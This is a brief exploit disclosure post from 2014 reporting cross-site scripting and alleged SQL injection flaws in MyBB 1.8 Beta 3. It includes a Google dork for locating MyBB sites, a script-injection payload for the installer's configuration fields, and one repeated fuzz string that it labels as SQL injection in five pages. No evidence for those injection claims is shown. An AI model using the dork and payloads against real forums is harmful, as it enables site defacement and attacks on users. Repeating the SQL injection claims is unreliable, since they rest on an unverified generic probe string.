MyBB 1.8 Beta 3 Cross Site Scripting / SQL Injection

`# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection  
# Google Dork: intext:"Powered By MyBB"  
# Date: 15.08.2014  
# Author: DemoLisH  
# Vendor Homepage: http://www.mybb.com/  
# Software Link: http://www.mybb.com/downloads  
# Version: 1.8 - Beta 3  
# Contact: [email protected]  
***************************************************  
a) Cross Site Scripting in Installation Wizard ( Board Configuration )  
Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>localhost/install/index.php  
Now let's finish setup and go to the homepage.  
  
  
b) SQL Injection in Private Messages ( User CP )  
Go to -> Inbox, for example:localhost/private.php  
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload  
  
  
c) SQL Injection in Showthread  
Go to -> Show Thread, for example:localhost/showthread.php?tid=1  
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload  
  
  
d) SQL Injection in Search  
Go to -> Search, for example:localhost/search.php  
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload  
  
  
e) SQL Injection in Help Documents  
Go to -> Help Documents, for example:localhost/misc.php?action=help  
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload  
  
  
f) SQL Injection in Forum Display  
Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2  
Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload  
  
***************************************************  
[~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.  
  
`